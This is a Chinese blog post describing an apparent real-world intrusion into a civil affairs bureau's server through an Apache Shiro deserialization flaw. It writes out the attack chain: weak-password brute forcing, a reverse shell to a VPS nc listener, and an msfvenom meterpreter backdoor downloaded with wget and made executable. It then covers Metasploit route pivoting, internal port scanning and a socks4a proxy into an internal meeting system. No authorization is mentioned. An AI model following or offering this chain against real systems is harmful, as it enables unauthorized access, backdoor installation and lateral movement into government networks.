0X00 前言
@Adminxe 这是主要是利用shiro反序列化漏洞的一次渗透利用,可能有些地方不是很详细,主要还是分享过程
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。未经授权,请勿随便转载!
0x01 渗透过程
前期打点:
开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户
返回包存在 :Set-Cookie: rememberMe=deleteMe参数,
测试一下 shiro漏洞,万一没修复就捡到了,美滋滋
成功打到DNSLOG 返回信息
得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,
vps 开启NC 监听 nc -lvp 777 成功返回
获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成 elf 后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
把生成好的后门放在远程HTTP服务上面,
在shell里,wget 远程下载
成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root
msf 运行命令 use exploit/multi/handler 获得shell反弹地址
set payload linux/x64/meterpreter/reverse_tcp
地址填写VPS 端口写后门端口就好了,直接run
查看内网路由,添加路由命令
run get_local_subnets //获取路由地址
run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
run autoroute -p //查看添加的路由
run autorouute -d //删除添加的路由
内网扫描端口 use auxiliary/scanner/portscan/tcp
利用msf socks4a模块代理
use auxiliary/server/socks4a
set SRVHOST IP
set SRVPORT 端口
运行返回信息:
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问
某会议系统
0x02 总结
1.弱口令爆破
2.shiro反序列化漏洞
3.端口转发
4.shell反弹
5.添加路由
6.socks4a代理
注:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。未经授权,请勿随便转载!
转载请注明:Adminxe's Blog » 对某民政局shiro反序列化漏洞的渗透过程